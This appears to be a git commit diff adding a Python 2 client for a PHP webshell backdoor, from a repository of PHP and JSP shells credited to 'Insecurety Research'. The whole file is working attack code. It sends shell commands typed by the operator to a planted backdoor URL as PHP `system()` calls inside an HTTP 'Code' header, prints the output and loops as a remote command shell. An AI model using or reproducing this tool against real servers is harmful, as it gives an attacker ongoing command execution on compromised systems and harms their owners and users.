update

php shell and jsp shell

php/php-sh/client.py

@@ -0,0 +1,41 @@
+#!/usr/bin/python
+# Client for the backdoor which
+# uses HTTP CODE header for inserting code
+# Got the idea after seeing this sort of payload
+# dropped by a phpmyadmin exploit on rdot :)
+# Is also good to learn how to use urllib
+# and not be lazy arse with requests all of time!
+# Insecurety Research (2013) - insecurety.net
+import urllib2
+import sys
+
+def usage(program):
+    print "HTTP CODE Header Backdoor Command Shell"
+    print "Usage: %s <Backdoor URL>" %(program)
+    print "Example: %s http://www.test.com/webshell.php" %(program)
+    sys.exit(0)
+
+def main(args):
+    try:
+        if len(args) < 2:
+            usage(args[0])
+
+        print "[+] Using %s as target" %(args[1])
+        print "[!] Popping a shell, type 'exit' to quit"
+        while True:
+            opener = urllib2.build_opener()
+            url = args[1]
+            cmd = raw_input('~$ ')
+            if cmd == "exit":
+                sys.exit(0)
+            else:
+                code = "system('%s');" %(cmd)
+                opener.addheaders.append(('Code', code))# %(str(code))
+                urllib2.install_opener(opener)
+                result = urllib2.urlopen(url).read()
+                print result
+    except Exception, e:
+        print e
+
+if __name__ == "__main__": 
+    main(sys.argv)